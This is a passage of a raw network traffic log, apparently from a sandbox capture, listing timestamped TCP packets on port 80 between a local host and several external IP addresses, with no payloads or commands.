Jul 27, 2023 20:19:28.853632927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853652954 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853669882 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.853671074 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.853674889 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853724957 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.853970051 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853990078 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854046106 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.854079962 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854100943 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854129076 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854142904 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.854470968 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854491949 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854530096 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.854542971 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854562044 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.854604006 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.858971119 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859018087 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859057903 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859078884 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.859096050 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859103918 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.859275103 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859311104 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859347105 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859358072 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.859384060 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859388113 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.859422922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859476089 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.859755039 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859795094 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859829903 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859848976 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.859863997 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.859899998 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.860338926 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860378981 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860408068 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860445023 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860480070 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860511065 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.860548973 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.860877037 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860918045 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860946894 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.860955954 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.860992908 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.861044884 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.861054897 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.861116886 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.861264944 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.861305952 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.861341953 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.861361980 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.861368895 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.861418009 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.901779890 CEST	49800	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.902420998 CEST	49801	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.933773994 CEST	80	49800	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.933949947 CEST	49800	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.934007883 CEST	80	49801	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.934148073 CEST	49801	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.935512066 CEST	49801	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.967236996 CEST	80	49801	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.968585968 CEST	80	49801	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.969645977 CEST	49801	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.078577042 CEST	49801	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.079241037 CEST	49802	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.092489958 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.092576027 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.108828068 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.109090090 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.110536098 CEST	80	49801	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.111002922 CEST	80	49802	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.111128092 CEST	49801	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.111177921 CEST	49802	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.111624956 CEST	49802	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.115571976 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.115638018 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.116108894 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116156101 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116202116 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116204977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.116247892 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116291046 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.116321087 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116647005 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116694927 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.116697073 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116741896 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116780043 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.116789103 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116837025 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.116875887 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.117048025 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117096901 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117140055 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.117141008 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117187977 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117233038 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.117594957 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117645979 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117691040 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117707968 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.117734909 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117780924 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.117820978 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.118061066 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.118102074 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.118145943 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.124670982 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.124775887 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.124830961 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.124890089 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.124890089 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.124895096 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125058889 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125102997 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.125104904 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125152111 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125190020 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.125199080 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125245094 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125289917 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.125576973 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125628948 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125674009 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125675917 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.125720024 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.125761032 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.126172066 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126224041 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126265049 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.126270056 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126313925 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126357079 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126357079 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.126645088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126693964 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.126697063 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126743078 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126782894 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.126787901 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126833916 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.126873016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.127244949 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.127294064 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.127332926 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.127336979 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.143260956 CEST	80	49802	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.145142078 CEST	80	49802	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.145245075 CEST	49802	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.164218903 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:29.229424953 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.263549089 CEST	49802	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.264611959 CEST	49803	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.295614958 CEST	80	49802	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.295691013 CEST	49802	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.296384096 CEST	80	49803	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.296489000 CEST	49803	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.297665119 CEST	49803	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.318892002 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:29.319103003 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:29.329958916 CEST	80	49803	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.332465887 CEST	80	49803	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.332550049 CEST	49803	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.372669935 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382253885 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382289886 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382316113 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382401943 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.382442951 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.382698059 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382735968 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382761002 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382785082 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382790089 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.382810116 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.382824898 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.383128881 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383156061 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383177042 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.383181095 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383203983 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383233070 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.383627892 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383654118 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383678913 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.383774996 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383810043 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383836985 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.383852005 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.383888006 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.384176016 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.384201050 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.384248972 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.384249926 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.384295940 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.384342909 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.385014057 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.385041952 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.385096073 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.385118961 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.385119915 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.385139942 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.385163069 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.385176897 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.385209084 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.391819954 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.391861916 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.391895056 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.391923904 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.392256021 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392321110 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.392369986 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392791986 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392828941 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392863035 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392869949 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.392906904 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.392908096 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392939091 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.392970085 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393001080 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393006086 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.393040895 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.393250942 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393300056 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393345118 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393366098 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.393389940 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393431902 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.393436909 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393793106 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393835068 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393871069 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393874884 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.393913031 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.393930912 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.394237995 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.394282103 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.394290924 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.394326925 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.394365072 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.394367933 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.394407034 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.394453049 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.438195944 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.448678017 CEST	49803	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.449295044 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:29.449315071 CEST	49804	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.480631113 CEST	80	49803	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.480714083 CEST	49803	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.481265068 CEST	80	49804	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.481394053 CEST	49804	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.481750011 CEST	49804	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.486830950 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.513933897 CEST	80	49804	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.514992952 CEST	80	49804	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.515122890 CEST	49804	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.618119001 CEST	80	49797	200.114.247.163	192.168.2.4
Jul 27, 2023 20:19:29.618308067 CEST	49797	80	192.168.2.4	200.114.247.163
Jul 27, 2023 20:19:29.620063066 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.620111942 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:29.623632908 CEST	80	49797	200.114.247.163	192.168.2.4
Jul 27, 2023 20:19:29.624334097 CEST	49797	80	192.168.2.4	200.114.247.163
Jul 27, 2023 20:19:29.625557899 CEST	49804	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.626202106 CEST	49805	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.642522097 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:29.642642975 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:29.650105000 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650134087 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650152922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650373936 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.650490046 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650557995 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.650649071 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650667906 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650718927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650882006 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.650906086 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650924921 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650943995 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650962114 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.650979996 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.651010036 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.651753902 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.651773930 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.651792049 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.651819944 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.651833057 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.651838064 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.651880980 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.651904106 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.652514935 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.652535915 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.652554035 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.652570963 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.652606010 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.652640104 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.652645111 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.652726889 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.652780056 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.657268047 CEST	80	49804	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.657708883 CEST	49804	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.657763004 CEST	80	49805	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:29.657881021 CEST	49805	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.658066034 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658086061 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658104897 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658144951 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.658229113 CEST	49805	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:29.658747911 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658767939 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658786058 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658804893 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.658827066 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.658855915 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.659008980 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659028053 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659046888 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659064054 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659076929 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659099102 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.659677029 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:29.659722090 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659743071 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659759998 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:29.659780025 CEST	80	49778	183.100.39.157	192.168.2.4
